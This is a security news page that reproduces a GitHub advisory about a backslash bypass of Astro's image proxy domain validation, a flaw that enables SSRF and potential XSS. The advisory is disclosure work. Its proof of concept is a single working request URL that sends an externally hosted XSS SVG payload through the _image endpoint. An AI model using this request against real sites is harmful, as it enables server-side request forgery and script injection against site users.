Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-qcpr-679q-rhm2: Astro's bypass of image proxy domain validation leads to SSRF and potential XSS

Summary

This is a patch bypass of CVE-2025-58179 in commit 9ecf359. The fix blocks http://, https:// and //, but can be bypassed using backslashes (\) - the endpoint still issues a server-side fetch.

PoC

https://astro.build/_image?href=\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg

ghsa
#xss#git#ssrf

Astro’s bypass of image proxy domain validation leads to SSRF and potential XSS

High severity GitHub Reviewed Published Oct 28, 2025 in withastro/astro • Updated Oct 28, 2025

ghsa: Latest News

GHSA-7f5h-v6xp-fcq8: Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``